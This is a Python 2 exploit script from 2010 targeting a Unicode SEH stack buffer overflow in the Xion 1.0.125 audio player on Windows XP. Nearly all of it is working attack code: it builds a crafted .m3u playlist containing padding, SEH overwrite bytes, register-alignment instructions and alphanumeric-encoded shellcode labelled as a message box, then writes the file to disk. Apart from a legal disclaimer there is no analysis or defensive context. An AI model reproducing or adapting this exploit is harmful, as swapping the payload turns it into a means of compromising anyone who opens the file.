#!/usr/bin/python
# #######################################################################
# Title: Xion 1.0.125 Stack Buffer Overflow
# Date: August 13, 2010
# Author: corelanc0d3r and dijital1
# Grtz to dijital1 : I had a lot of fun working with
# you on this one ! :)
# Grtz to dookie2000ca :)
# Original Advisory: http://www.exploit-db.com/exploits/14517 (hadji samir)
# Platform: Windows XP SP3 En Professional - VirtualBox
# Greetz to: Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
# #######################################################################
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Corelan does not want anyone to use this script
# for malicious and/or illegal purposes
# Corelan cannot be held responsible for any illegal use.
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.
#
print "|------------------------------------------------------------------|"
print "| __ __ |"
print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |"
print "| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |"
print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |"
print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |"
print "| |"
print "| http://www.corelan.be:8800 |"
print "| security@corelan.be |"
print "| |"
print "|-------------------------------------------------[ EIP Hunters ]--|"
print " -= Exploit for Xion 1.0.125 - Unicode (SEH) - corelanc0d3r =-"
print ""
print " [+] Preparing payload..."
outputfile="corelanc0d3r.m3u"
offset_to_nseh=250 #affected by the m3u path length !
junk = "A" * offset_to_nseh
nseh="\x41\x45"
seh="\x93\x47" #Unicode conversion : 0x0047201C => mov eax,esi + ppr
junk2="\x45"
align="\x55" #push ebp
align=align+"\x6d" #pad (ebp is writable)
align=align+"\x58" #pop eax
align=align+"\x6d"
align=align+"\x05\x25\x11"
align=align+"\x6d"
align=align+"\x2d\x11\x11"
align=align+"\x6d"
align=align+"\x50\x6d\xc3" #go!
align=align+"I"*56
#msgbox
shellcode="PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AI"
shellcode+="AIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBhYzKskhY4"
shellcode+="4nDJTLq6rfRajNQuyOtTKQaP0TKt6LLTKQfkl2koVJh4K3NO02kOFOHpOKhrUJS29Z"
shellcode+="axQyo8as0DK0lNDKtDKOUMlBkntKUqhKQxjBkmzJxdKQJKpkQzKgsP7MyDKltDKjaJ"
shellcode+="NLqkO017PKLVL2dGPQdKZWQ6olMkQI7xizQ9oyoKOOKSLktmX45GnDKQJktjaHkpfD"
shellcode+="KlL0KrkNzMLiqZKBkyt4KM1iX2iMtKtkloqVcVRlHNIhT3YHe1ywRoxdNNnZnJLr2W"
shellcode+="x5LKOIoKOqymuitEkSNvxgrd357KlktobYXDKIokOKOu9oUyx0hplplo0yoQXNSoBL"
shellcode+="nC4QXPupsS52R58aLMTlJqyJFR6KOaEKTqyWRB07KUXW2NmwLDGMLktpRWxQNKOkOi"
shellcode+="orHnxKpo0Kpph1DS5s1BMphplc1PnmPoxpCrOprpeNQIKDHOlktZl4IK3aXrRNxMPO"
shellcode+="0oxbCNPOtMcQXREplOqpn38mPOsPobRQXbDKps2RY0hNoD7pn35May9sXPLO4ju2iY"
shellcode+="QNQyBobOcnqQB9o8PNQY00PIoPUyxKZA"
junk3="\x49"*2550
payload=junk+nseh+seh+junk2+align+shellcode+junk3
print " [+] Writing payload to file "+outputfile+" (" + str(len(payload))+" bytes)"
FILE = open(outputfile, "w")
FILE.write(payload)
FILE.close()
print " [+] Done"